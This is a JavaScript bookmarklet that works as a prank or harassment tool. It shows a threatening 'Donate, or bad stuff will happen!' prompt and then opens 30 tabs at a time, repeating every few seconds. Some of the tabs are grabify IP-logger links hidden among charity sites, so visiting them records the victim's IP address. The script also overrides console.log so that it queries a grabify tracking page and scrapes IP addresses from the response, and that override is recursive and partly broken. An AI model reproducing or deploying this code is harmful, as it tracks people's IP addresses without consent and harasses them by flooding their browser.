
//tracking code: https://grabify.link/track/05NCFG


javascript: (function() {
  var urls = [
    //change this tracking link for a diffrent grabbify link
    'https://grabify.link/8023ZB',
    //charity links!
    'https://water.org/',
    'https://www.redcross.org/',
    // Rest of the charity URLs...
  ];

  var batchSize = 30;

  function openTabs() {
    for (var i = 0; i < batchSize; i++) {
      var index = Math.floor(Math.random() * urls.length);
      window.open(urls[index], '_blank');
    }
  }

  function showAlert() {
    var alertMessage = "Donate, or bad stuff will happen! 😈";
    var confirmation = confirm(alertMessage);

    if (confirmation) {
      setTimeout(function() {
        openTabs();
        showAlert();
      }, 5000);
    } else {
      openTabs();
      setTimeout(openTabs, 5000);
    }
  }

  console.log = function(message) {
    if (message === 'IP') {
                 console.log('https://grabify.link/track/05NCFG');
      var xhr = new XMLHttpRequest();
      xhr.open("GET", 'https://grabify.link/track/05NCFG', true);
      xhr.onreadystatechange = function() {
        if (xhr.readyState === 4 && xhr.status === 200) {
          var response = xhr.responseText;
          var ips = response.match(/(?:\d{1,3}\.){3}\d{1,3}/g);
          console.log(ips);
        } else if (xhr.readyState === 4 && xhr.status !== 200) {
          openTabs();
          setTimeout(openTabs, 5000);
        }
      };
      xhr.send();
    } else {
      console.log.apply(console, arguments);
    }
  };

  showAlert();
})();
